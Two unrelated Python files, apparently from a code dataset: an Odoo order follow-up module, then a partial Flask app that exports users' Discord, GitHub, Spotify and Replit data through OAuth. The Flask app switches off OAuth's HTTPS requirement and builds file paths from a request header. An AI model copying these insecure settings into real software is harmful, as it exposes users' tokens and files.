result['domain'] = "[('id', 'in', [" + ','.join(map(str, pick_ids)) + "])]"
elif len(pick_ids) == 1:
res = self.env.ref('stock.view_picking_form', False)
result['views'] = [(res and res.id or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
@api.model
def create(self, vals):
res = super(OFFollowupProject, self).create(vals)
res.order_id.write({'of_followup_project_id': res.id})
return res
@api.model
def cron_move_project(self):
for project in self.search([]):
project._compute_stage_id()
@api.model
def cron_recompute_reference_laying_date(self):
for project in self.search([]):
project._compute_reference_laying_date()
@api.multi
def last_step_for_all(self):
for followup in self:
for task in followup.other_task_ids:
states = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('sequence', '>', task.state_id.sequence)])
if states:
task.state_id = states[-1].id
class OFFollowupProjectStage(models.Model):
_name = 'of.followup.project.stage'
_description = "Etat de suivi des projets"
_order = 'sequence'
name = fields.Char(string=u"Nom")
code = fields.Char(string=u"Code")
sequence = fields.Integer(string=u"Séquence")
fold = fields.Boolean(string=u"Replié par défaut")
week_diff_min = fields.Integer(string=u"Différence de semaine minimale")
week_diff_max = fields.Integer(string=u"Différence de semaine maximale")
class OFFollowupTask(models.Model):
_name = 'of.followup.task'
_description = u"Tâche liée au suivi des projets"
_order = 'sequence'
project_id = fields.Many2one(
comodel_name="of.followup.project", string=u"Projet", required=True, ondelete='cascade')
sequence = fields.Integer(string=u"Séquence")
type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type", required=True)
name = fields.Char(string=u"Nom", required=True)
state_id = fields.Many2one(comodel_name='of.followup.task.type.state', string=u"Etat")
predefined_state_id = fields.Many2one(
comodel_name='of.followup.task.type.state', string=u"Etat", compute='_compute_predefined_state_id')
global_state = fields.Char(string=u"État", compute='_compute_global_state')
predefined_task = fields.Boolean(string=u"Tâche pré-définie", related='type_id.predefined_task')
force_state = fields.Boolean(string=u"Gestion manuelle de l'état")
is_late = fields.Boolean(string=u"Tâche en retard", compute='_compute_is_late')
is_done = fields.Boolean(string=u"Tâche terminée", compute='_compute_is_done')
is_not_processed = fields.Boolean(string=u"Tâche non traitée", compute='_compute_is_not_processed')
planif_intervention_ids = fields.One2many(
comodel_name='of.planning.intervention', string=u"RDVs d'intervention planifiés",
compute='_compute_planif_intervention_ids')
display_planif_interventions = fields.Boolean(
string=u"Afficher les RDVs d'intervention planifiés ?", compute='_compute_planif_intervention_ids')
vt_intervention_ids = fields.One2many(
comodel_name='of.planning.intervention', string=u"RDVs visite technique",
compute='_compute_vt_intervention_ids')
display_vt_interventions = fields.Boolean(
string=u"Afficher les RDVs visite technique ?", compute='_compute_vt_intervention_ids')
app_order_line_ids = fields.One2many(
comodel_name='sale.order.line', string=u"Lignes de commande appareils", compute='_compute_app_order_line_ids')
display_app_order_lines = fields.Boolean(
string=u"Afficher les lignes de commande appareils ?", compute='_compute_app_order_line_ids')
acc_order_line_ids = fields.One2many(
comodel_name='sale.order.line', string=u"Lignes de commande accessoires", compute='_compute_acc_order_line_ids')
display_acc_order_lines = fields.Boolean(
string=u"Afficher les lignes de commande accessoires ?", compute='_compute_acc_order_line_ids')
app_picking_line_ids = fields.One2many(
comodel_name='stock.move', string=u"Lignes de BL appareils", compute='_compute_app_picking_line_ids')
display_app_picking_lines = fields.Boolean(
string=u"Afficher les lignes de BL appareils ?", compute='_compute_app_picking_line_ids')
acc_picking_line_ids = fields.One2many(
comodel_name='stock.move', string=u"Lignes de BL accessoires", compute='_compute_acc_picking_line_ids')
display_acc_picking_lines = fields.Boolean(
string=u"Afficher les lignes de BL accessoires ?", compute='_compute_acc_picking_line_ids')
@api.multi
def _compute_predefined_state_id(self):
for rec in self:
if not rec.type_id.state_ids or not rec.type_id.state_ids.filtered(lambda s: s.starting_state):
continue
rec.predefined_state_id = rec.type_id.state_ids.filtered(lambda s: s.starting_state)[0]
# Planification
if rec.type_id == self.env.ref('of_followup.of_followup_task_type_planif'):
interventions = rec.planif_intervention_ids
# Il existe des RDV d'intervention et ils sont tous au statut 'Réalisé'
if interventions and not interventions.filtered(lambda i: i.state not in ['done', 'cancel']):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_planif_03')
# Il existe au moins un RDV d'intervention au statut 'Confirmé'
elif interventions.filtered(lambda i: i.state == 'confirm'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_planif_02')
# Visite technique
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_vt'):
interventions = rec.vt_intervention_ids
# Il existe un RDV d'intervention de tâche "VT" au statut 'Réalisé'
if interventions.filtered(lambda i: i.state == 'done'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_vt_03')
# Il existe un RDV d'intervention de tâche "VT" au statut 'Confirmé'
elif interventions.filtered(lambda i: i.state == 'confirm'):
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_vt_02')
# Appareils
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_app'):
app_order_lines = rec.app_order_line_ids
po_validated = bool(app_order_lines)
receipt_validated = bool(app_order_lines)
# Non kit
for app_order_line in app_order_lines.filtered(lambda l: not l.of_is_kit):
stock_moves = app_order_line.procurement_ids.mapped('move_ids')
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < app_order_line.product_uom_qty:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if app_order_line.product_uom_qty - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
# Kit
for app_order_line in app_order_lines.filtered(lambda l: l.of_is_kit):
for kit_line in app_order_line.kit_id.kit_line_ids.filtered(
lambda l: l.product_id.type == 'product'):
stock_moves = kit_line.procurement_ids.mapped('move_ids')
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(
self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < kit_line.qty_per_kit:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if kit_line.qty_per_kit - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not app_order_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_02')
# Accessoires
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_acc'):
acc_order_lines = rec.acc_order_line_ids
po_validated = bool(acc_order_lines)
receipt_validated = bool(acc_order_lines)
# Non kit
for acc_order_line in acc_order_lines.filtered(lambda l: not l.of_is_kit):
stock_moves = acc_order_line.procurement_ids.mapped('move_ids')
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < acc_order_line.product_uom_qty:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if acc_order_line.product_uom_qty - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
# Kit
for acc_order_line in acc_order_lines.filtered(lambda l: l.of_is_kit):
for kit_line in acc_order_line.kit_id.kit_line_ids.filtered(
lambda l: l.product_id.type == 'product'):
stock_moves = kit_line.procurement_ids.mapped('move_ids')
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(
self.env['stock.quant'].search([('reservation_id', 'in', stock_moves.ids)]).mapped('qty'))
if qty < kit_line.qty_per_kit:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', 'in', stock_moves.ids)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if kit_line.qty_per_kit - qty <= sum(validated_purchase_lines.mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not acc_order_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_app_02')
# Appareils hors commande
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_out_app'):
app_picking_lines = rec.app_picking_line_ids
po_validated = bool(app_picking_lines)
receipt_validated = bool(app_picking_lines)
for app_picking_line in app_picking_lines:
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(self.env['stock.quant'].search([('reservation_id', '=', app_picking_line.id)]).
mapped('qty'))
if qty < app_picking_line.product_uom_qty:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', '=', app_picking_line.id)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if app_picking_line.product_uom_qty - qty <= sum(validated_purchase_lines.
mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not app_picking_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_app_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_app_02')
# Accessoires hors commande
elif rec.type_id == self.env.ref('of_followup.of_followup_task_type_out_acc'):
acc_picking_lines = rec.acc_picking_line_ids
po_validated = bool(acc_picking_lines)
receipt_validated = bool(acc_picking_lines)
for acc_picking_line in acc_picking_lines:
# On regarde d'abord si les articles sont déjà en stock/réservés
qty = sum(self.env['stock.quant'].search([('reservation_id', '=', acc_picking_line.id)]).
mapped('qty'))
if qty < acc_picking_line.product_uom_qty:
# On récupère la(les) ligne(s) de commande d'achat validée associée(s)
purchase_procurement_orders = self.env['procurement.order'].search(
[('move_dest_id', '=', acc_picking_line.id)])
validated_purchase_lines = purchase_procurement_orders.mapped('purchase_line_id').filtered(
lambda l: l.order_id.state == 'purchase')
# On contrôle que les quantités commandées correspondent
if acc_picking_line.product_uom_qty - qty <= sum(validated_purchase_lines.
mapped('product_qty')):
receipts = validated_purchase_lines.mapped('order_id').mapped('picking_ids')
if not receipts or receipts != receipts.filtered(lambda r: r.state == 'done'):
receipt_validated = False
else:
po_validated = False
break
if not acc_picking_lines:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_np')
else:
if po_validated:
if receipt_validated:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_acc_03')
else:
rec.predefined_state_id = self.env.ref('of_followup.of_followup_task_type_state_out_acc_02')
@api.multi
@api.depends('state_id', 'predefined_state_id', 'predefined_task', 'force_state')
def _compute_global_state(self):
for rec in self:
if rec.predefined_task and not rec.force_state:
rec.global_state = rec.predefined_state_id.name
else:
rec.global_state = rec.state_id and rec.state_id.name or ""
@api.multi
def _compute_is_late(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_late = False
else:
if rec.predefined_task and not rec.force_state:
late_stage = rec.predefined_state_id.stage_id
else:
late_stage = rec.state_id.stage_id
if late_stage and late_stage.sequence <= rec.project_id.stage_id.sequence:
rec.is_late = True
else:
rec.is_late = False
@api.multi
def _compute_is_done(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_done = False
else:
if rec.predefined_task and not rec.force_state:
final_state = rec.predefined_state_id.final_state
else:
final_state = rec.state_id.final_state
if final_state:
rec.is_done = True
else:
rec.is_done = False
@api.multi
def _compute_is_not_processed(self):
not_processed_state = self.env.ref('of_followup.of_followup_task_type_state_np')
for rec in self:
if rec.predefined_task and not rec.force_state and rec.predefined_state_id == not_processed_state:
rec.is_not_processed = True
else:
rec.is_not_processed = False
@api.multi
def _compute_planif_intervention_ids(self):
planif_task_type = self.env.ref('of_followup.of_followup_task_type_planif')
planning_tache_categs = planif_task_type.planning_tache_categ_ids
for rec in self:
if rec.type_id == planif_task_type:
rec.planif_intervention_ids = rec.project_id.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planning_tache_categs.ids)
rec.display_planif_interventions = True
else:
rec.planif_intervention_ids = False
rec.display_planif_interventions = False
@api.multi
def _compute_vt_intervention_ids(self):
vt_task_type = self.env.ref('of_followup.of_followup_task_type_vt')
planning_tache_categs = vt_task_type.planning_tache_categ_ids
for rec in self:
if rec.type_id == vt_task_type:
rec.vt_intervention_ids = rec.project_id.order_id.intervention_ids.filtered(
lambda i: i.tache_id.tache_categ_id.id in planning_tache_categs.ids)
rec.display_vt_interventions = True
else:
rec.vt_intervention_ids = False
rec.display_vt_interventions = False
@api.multi
def _compute_app_order_line_ids(self):
app_task_type = self.env.ref('of_followup.of_followup_task_type_app')
product_categs = app_task_type.product_categ_ids
for rec in self:
if rec.type_id == app_task_type:
rec.display_app_order_lines = True
if rec.project_id.order_id.state == 'sale':
rec.app_order_line_ids = rec.project_id.order_id.order_line.filtered(
lambda l: l.product_id.categ_id.id in product_categs.ids and
(l.product_id.type == 'product' or l.of_is_kit) and l.product_uom_qty > 0)
else:
rec.app_order_line_ids = False
else:
rec.app_order_line_ids = False
rec.display_app_order_lines = False
@api.multi
def _compute_acc_order_line_ids(self):
acc_task_type = self.env.ref('of_followup.of_followup_task_type_acc')
app_task_type = self.env.ref('of_followup.of_followup_task_type_app')
product_categs = app_task_type.product_categ_ids
for rec in self:
if rec.type_id == acc_task_type:
rec.display_acc_order_lines = True
if rec.project_id.order_id.state == 'sale':
rec.acc_order_line_ids = rec.project_id.order_id.order_line.filtered(
lambda l: l.product_id.categ_id.id not in product_categs.ids and
(l.product_id.type == 'product' or l.of_is_kit) and l.product_uom_qty > 0)
else:
rec.acc_order_line_ids = False
else:
rec.acc_order_line_ids = False
rec.display_acc_order_lines = False
@api.multi
def _compute_app_picking_line_ids(self):
out_app_task_type = self.env.ref('of_followup.of_followup_task_type_out_app')
product_categs = out_app_task_type.product_categ_ids
for rec in self:
if rec.type_id == out_app_task_type:
rec.app_picking_line_ids = rec.project_id.order_id.picking_ids.mapped('move_lines').\
filtered(lambda l: not l.procurement_id and
l.product_id.categ_id.id in product_categs.ids and l.product_uom_qty > 0)
rec.display_app_picking_lines = True
else:
rec.app_picking_line_ids = False
rec.display_app_picking_lines = False
@api.multi
def _compute_acc_picking_line_ids(self):
out_acc_task_type = self.env.ref('of_followup.of_followup_task_type_out_acc')
out_app_task_type = self.env.ref('of_followup.of_followup_task_type_out_app')
product_categs = out_app_task_type.product_categ_ids
for rec in self:
if rec.type_id == out_acc_task_type:
rec.acc_picking_line_ids = rec.project_id.order_id.picking_ids.mapped('move_lines'). \
filtered(lambda l: not l.procurement_id and l.product_id.categ_id.id not in product_categs.ids and
l.product_uom_qty > 0)
rec.display_acc_picking_lines = True
else:
rec.acc_picking_line_ids = False
rec.display_acc_picking_lines = False
@api.onchange('type_id')
def _onchange_type_id(self):
self.state_id = False
if self.type_id and not self.predefined_task or self.force_state:
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', self.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
self.state_id = state
@api.multi
def next_step(self):
self.ensure_one()
if self.predefined_task and not self.force_state:
# On affiche une pop-up de confirmation
return {
'type': 'ir.actions.act_window',
'name': "Avertissement !",
'view_type': 'form',
'view_mode': 'form',
'res_model': 'of.followup.confirm.next.step',
'target': 'new',
}
else:
# On cherche l'étape suivante
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', self.type_id.id), ('sequence', '>', self.state_id.sequence)], limit=1)
if state:
self.state_id = state.id
return True
@api.model
def create(self, vals):
res = super(OFFollowupTask, self).create(vals)
# Ajout d'un message dans le chatter du projet
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': res.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été ajoutée au suivi." % res.name,
'date': fields.Datetime.now(),
})
return res
@api.multi
def write(self, vals):
res = super(OFFollowupTask, self).write(vals)
if vals.get('state_id', False):
for rec in self:
# Ajout d'un message dans le chatter du projet
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': rec.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été passée à l'état %s." % (rec.name, rec.state_id.name),
'date': fields.Datetime.now(),
})
return res
@api.multi
def unlink(self):
for rec in self:
# Ajout d'un message dans le chatter du projet
self.env['mail.message'].create({
'author_id': self.env.user.partner_id.id,
'model': 'of.followup.project',
'res_id': rec.project_id.id,
'type': 'comment',
'body': u"La tâche %s a été supprimée du suivi." % rec.name,
'date': fields.Datetime.now(),
})
return super(OFFollowupTask, self).unlink()
class OFFollowupTaskType(models.Model):
_name = 'of.followup.task.type'
_description = u"Type de tâches liées au suivi des projets"
name = fields.Char(string=u"Nom", required=True)
short_name = fields.Char(string=u"Nom court", required=True)
active = fields.Boolean(string=u"Actif", default=True)
predefined_task = fields.Boolean(string=u"Tâche pré-définie", readonly=True)
state_ids = fields.One2many(
comodel_name='of.followup.task.type.state', inverse_name='task_type_id', string=u"Etats")
planning_tache_categ_ids = fields.Many2many(
comodel_name='of.planning.tache.categ', string=u"Catégories de tâches planning")
product_categ_ids = fields.Many2many(
comodel_name='product.category', string=u"Catégories d'articles")
class OFFollowupTaskTypeState(models.Model):
_name = 'of.followup.task.type.state'
_description = u"Etat des types de tâches liées au suivi des projets"
_order = 'sequence, id desc'
task_type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type de tâche", ondelete='cascade')
sequence = fields.Integer(string=u"Séquence")
name = fields.Char(string=u"Nom", required=True)
starting_state = fields.Boolean(string=u"Etat de départ")
final_state = fields.Boolean(string=u"Etat final")
stage_id = fields.Many2one(
comodel_name='of.followup.project.stage', string=u"En retard à partir de la période",
domain=[('code', 'not in', ['new', 'coming', 's+'])])
@api.model
def create(self, vals):
# Gestion de la séquence lors de la création
if vals.get('task_type_id'):
other_states = self.search([('task_type_id', '=', vals.get('task_type_id'))])
if other_states:
sequence = max(other_states.mapped('sequence')) + 1
else:
sequence = 0
vals.update({'sequence': sequence})
return super(OFFollowupTaskTypeState, self).create(vals)
class OFFollowupProjectTemplate(models.Model):
_name = 'of.followup.project.template'
_description = "Modèle de suivi des projets"
name = fields.Char(string=u"Nom", required=True)
task_ids = fields.One2many(
comodel_name='of.followup.project.tmpl.task', inverse_name='template_id', string=u"Tâches")
default = fields.Boolean(string=u"Modèle par défaut")
class OFFollowupProjectTmplTask(models.Model):
_name = 'of.followup.project.tmpl.task'
_description = u"Type de tâches liées au modèle de suivi"
_order = 'sequence'
template_id = fields.Many2one(comodel_name='of.followup.project.template', string=u"Modèle de suivi")
sequence = fields.Integer(string=u"Séquence")
type_id = fields.Many2one(comodel_name='of.followup.task.type', string=u"Type de tâche", required=True)
predefined_task = fields.Boolean(string=u"Tâche pré-définie", related='type_id.predefined_task', readonly=True)
name = fields.Char(string=u"Nom", related='type_id.name', readonly=True)
class OFFollowupProjectTag(models.Model):
_name = 'of.followup.project.tag'
_description = u"Étiquette du suivi commande"
name = fields.Char(string=u"Nom", required=True)
color = fields.Integer(string=u"Index couleur")
_sql_constraints = [
('name_uniq', 'unique (name)', u"Ce nom d'étiquette existe déjà !"),
]
class OFFollowupProjectAlert(models.Model):
_name = 'of.followup.project.alert'
_description = u"Alerte du suivi commande"
name = fields.Char(string=u"Nom", required=True)
color = fields.Integer(string=u"Index couleur", default=4)
class SaleOrder(models.Model):
_inherit = 'sale.order'
of_followup_project_id = fields.Many2one(comodel_name='of.followup.project', string=u"Suivi", copy=False)
of_follow_count = fields.Integer(string=u"Nombre de suivi", compute='_compute_of_followup_count')
@api.multi
def _compute_of_followup_count(self):
for rec in self:
if rec.of_followup_project_id:
rec.of_follow_count = 1
else:
rec.of_follow_count = 0
@api.multi
def action_followup_project(self):
self.ensure_one()
followup_project_obj = self.env['of.followup.project']
ir_config_obj = self.env['ir.config_parameter']
followup_project = followup_project_obj.search([('order_id', '=', self.id)])
if not followup_project and not ir_config_obj.get_param('of.followup.migration', False):
template = self.env['of.followup.project.template'].search([('default', '=', True)])
values = {
'order_id': self.id,
'template_id': template and template[0].id or False
}
followup_project = followup_project_obj.create(values)
if followup_project.template_id:
new_tasks = []
for task in followup_project.template_id.task_ids:
vals = {'sequence': task.sequence, 'type_id': task.type_id.id, 'name': task.name}
state = self.env['of.followup.task.type.state'].search(
[('task_type_id', '=', task.type_id.id), ('starting_state', '=', True)], limit=1)
if state:
if task.predefined_task:
vals.update({'predefined_state_id': state.id})
else:
vals.update({'state_id': state.id})
new_tasks += [(0, 0, vals)]
followup_project.task_ids = new_tasks
if self._context.get('auto_followup'):
followup_project.user_id = self._context.get('followup_creator_id')
return True
else:
return {
'type': 'ir.actions.act_window',
'view_mode': 'form',
'res_model': 'of.followup.project',
'res_id': followup_project.id,
'target': 'current',
'flags': {'initial_mode': 'edit', 'form': {'action_buttons': True, 'options': {'mode': 'edit'}}},
}
else:
if self._context.get('auto_followup') or ir_config_obj.get_param('of.followup.migration', False):
return True
else:
return {
'type': 'ir.actions.act_window',
'view_mode': 'form',
'res_model': 'of.followup.project',
'res_id': followup_project.id,
'target': 'current',
}
@api.multi
def action_confirm(self):
return super(SaleOrder, self).action_confirm()
ir_config_obj = self.env['ir.config_parameter']
if not self._context.get('order_cancellation', False) and \
not ir_config_obj.get_param('of.followup.migration', False):
for order in self:
order.with_context(auto_followup=True, followup_creator_id=self.env.user.id).sudo().\
action_followup_project()
return True
@api.multi
def action_view_followup(self):
self.ensure_one()
action = self.env.ref('of_followup.of_followup_project_action').read()[0]
if self.of_followup_project_id:
ctx = self._context.copy()
ctx.update({'search_default_order_id': self.id})
action['context'] = ctx
else:
action = {'type': 'ir.actions.act_window_close'}
return action
class File(dms_base.DMSModel):
_inherit = 'muk_dms.file'
@api.model
def of_get_object_partner_and_category(self, obj):
if obj._name == 'of.followup.project':
partner = obj.partner_id
categ = self.env.ref('of_followup.of_followup_project_file_category')
else:
partner, categ = super(File, self).of_get_object_partner_and_category(obj)
return partner, categ
@api.multi
def action_view_linked_record(self):
result = super(File, self).action_view_linked_record()
if self.of_file_type == 'related' and self.of_related_model == 'of.followup.project':
result['view_id'] = self.env.ref('of_followup.of_followup_project_form_view').id
return result
| odof/openfire | of_followup/models/of_followup.py | of_followup.py | py | 70,070 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "odoo.models.Model",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "odoo.models",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "odoo.api.model",
... |
2391690633 | from threading import Thread
from flask import Flask, request, redirect, session, render_template, send_file, Response, flash
from flask_session import Session
import os, json
from bs4 import BeautifulSoup, SoupStrainer
import requests, lxml, cchardet
app = Flask('')
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
from requests_oauthlib import OAuth2Session
import getpass
import random, string, asyncio
import os
import shutil
app.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
app.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
# Disable SSL requirement
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
# Settings for your app
base_discord_api_url = 'https://discordapp.com/api'
client_id = os.environ['DISCORD_CLIENT_ID'] # Get from https://discordapp.com/developers/applications
client_id.encode('unicode_escape')
client_secret = os.environ['DISCORD_CLIENT_SECRET']
redirect_uri='https://DataPak.coolcodersj.repl.co/oauth_callback'
scope = ['identify', 'email', 'connections', 'guilds', 'applications.builds.read']
token_url = 'https://discord.com/api/oauth2/token'
authorize_url = 'https://discord.com/api/oauth2/authorize'
app = Flask(__name__)
app.secret_key = os.environ['APP_SECRET_KEY'].encode('utf-8')
@app.route("/")
def home():
if 'discord_token' not in session.keys():
disc = ""
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response = discord.get(base_discord_api_url + '/users/@me')
disc = response.json()['username'] + "#" + response.json()['discriminator']
if not "gh_token" in session.keys():
gh = ""
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
gh = r.json()['login']
if not "spotify_token" in session.keys():
spotify = ""
else:
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if "error" in r.json() and r.json()['error']['message'] == "The access token expired":
spotify_client_id, spotify_client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': spotify_client_id,
"client_secret": spotify_client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
spotify = r.json()['display_name']
return render_template("index.html", replitusername=request.headers['X-Replit-User-Name'], discordusername=disc, gh=gh, spotify=spotify)
@app.route('/discord')
def discord():
oauth = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=scope)
login_url, state = oauth.authorization_url(authorize_url)
session['state'] = state
return redirect(login_url)
@app.route("/oauth_callback")
def oauth_callback():
print(type(client_id))
discord = OAuth2Session(client_id, redirect_uri=redirect_uri, state=session['state'], scope=scope)
token = discord.fetch_token(
token_url,
client_secret=client_secret,
authorization_response=request.url,
)
session['discord_token'] = token
return redirect("/")
@app.route("/discord/generate")
def gendisc():
if not 'discord_token' in session:
disc = ""
return redirect("/")
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response1 = discord.get(base_discord_api_url + '/users/@me')
response2 = discord.get(base_discord_api_url + '/users/@me/connections')
response3 = discord.get(base_discord_api_url + '/users/@me/guilds')
disc = {"account": response1.json(), "connections": response2.json(), "guilds": response3.json()}
resp = Response(json.dumps(disc))
resp.headers['Content-Type'] = 'application/json'
return resp
@app.route('/discord/info')
def discordinfo():
return render_template("discordinfo.html")
@app.route('/replit/info')
def replitinfo():
return render_template("replitinfo.html")
@app.route("/replit/generate")
def replit():
try:
username = request.headers['X-Replit-User-Name']
os.remove(f'DataPak{username}.zip')
except:
pass
globals()['replurls'] = []
def findrepls(r):
global replurls
if r.status_code == 200:
soup = BeautifulSoup(r.content, "lxml")
btn = soup.find_all('a', class_='jsx-688104393')
repls = soup.find_all("a", class_='repl-item-wrapper')
for g in repls:
globals()['replurls'].append(str(g['href']))
if btn != []:
r = requests.get(f"https://replit.com{btn[0]['href']}")
findrepls(r)
else:
return
r = requests.get(f"https://replit.com/@{request.headers['X-Replit-User-Name']}")
findrepls(r)
username = request.headers['X-Replit-User-Name']
os.mkdir(f"DataPak{username}")
for repl in replurls:
r = requests.get(f'https://replit.com{repl}.zip')
f = open(f'DataPak{username}/{repl.split("/")[-1]}.zip', "w+")
print(r.content, file=f)
f.close()
r = requests.get(f"https://replit.com/data/profiles/{request.headers['X-Replit-User-Name']}").json()
f = open(f'DataPak{username}/account.json', "a")
del r['repls']
print(r, file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/info')
def spotinfo():
return render_template('spotifyinfo.html')
@app.route('/spotify')
def spot():
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
scopes = [
'user-read-recently-played',
'user-top-read',
'user-read-playback-position',
'user-read-playback-state',
'user-read-currently-playing',
'playlist-read-private',
'playlist-read-collaborative',
'user-follow-read',
'user-follow-modify',
'user-library-read',
'user-read-email',
'user-read-private',
]
